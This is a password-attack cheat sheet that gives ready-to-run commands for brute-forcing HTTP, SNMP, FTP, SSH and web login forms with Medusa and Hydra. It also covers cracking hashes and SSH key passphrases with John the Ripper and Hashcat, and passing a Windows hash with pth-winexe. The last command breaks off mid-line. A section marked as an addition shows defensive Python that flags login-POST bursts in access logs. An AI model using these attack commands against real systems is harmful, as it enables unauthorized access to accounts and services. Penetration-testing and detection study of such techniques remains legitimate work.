Password attacks



Medusa

Brute force HTTP basic authentication.
medusa -h <IP Address> -u admin -P password.txt -M http -m DIR:/admin -T 10


Hydra

Can be used to brute force numerous services.
hydra -P password.txt -v <IP Address> snmp
hydra -l admin -P password.txt -v <IP Address> ftp
hydra -l root -P password.txt <IP Address> ssh
hydra -L users.txt -P password.txt <IP Address> www-get /admin

Brute force http-post login forms

Format: hydra -L <path to user wordlist> -P <path to password wordlist> <IP Address> http-post-form "<Login Page>:<Request Body>:<Error Message>"
Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP Address> http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!"
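
Seen from the defending side, the http-post-form run above shows up in the web server access log as a burst of POST requests to the login page from one client. The following is an added example, not part of the original notes, that flags such bursts; the log lines are constructed, and the function name, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common/Combined Log Format: client address, timestamp, method, path.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)'
)

def find_login_bursts(lines, login_path, threshold=5,
                      window=timedelta(seconds=60)):
    """Return {client: peak number of POSTs to login_path inside `window`}
    for clients reaching `threshold`. Lines must be in time order.
    Status codes are ignored: a form that reports failure in the response
    body (e.g. "Invalid Password!") may still answer 200."""
    recent = defaultdict(deque)  # client -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        if m["method"] != "POST" or m["path"].split("?", 1)[0] != login_path:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

# Constructed sample: one client sends 8 POSTs in 8 seconds, another logs in once.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Mar/2024:12:00:{s:02d} +0000] '
    f'"POST /department/login.php HTTP/1.1" 200 512'
    for s in range(8)
] + [
    '198.51.100.20 - - [10/Mar/2024:12:00:03 +0000] "GET /department/login.php HTTP/1.1" 200 900',
    '198.51.100.20 - - [10/Mar/2024:12:00:09 +0000] "POST /department/login.php HTTP/1.1" 302 0',
    'not an access log line',
]

if __name__ == "__main__":
    for client, count in find_login_bursts(SAMPLE_LOG, "/department/login.php").items():
        print(f"{client}: {count} login POSTs within 60 s")
```

A flagged client is a candidate for rate limiting or temporary lockout on the login endpoint.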

John the Ripper

john <hash.txt> --wordlist=/usr/share/wordlists/rockyou.txt

SSH keys

To crack SSH key passwords, convert the key to a hash with ssh2john.py, then crack the hash using John.
python ssh2john.py id_rsa > id_rsa.hash


Hashcat

hashcat -m (mode) -a 0 hash.txt Pass.txt

Passing the hash (Windows)

Create the environment variable SMBHASH containing the hash we want to pass:
export SMBHASH=hashvalue
Use pth-winexe to authenticate:
pth-winexe -U administrator% //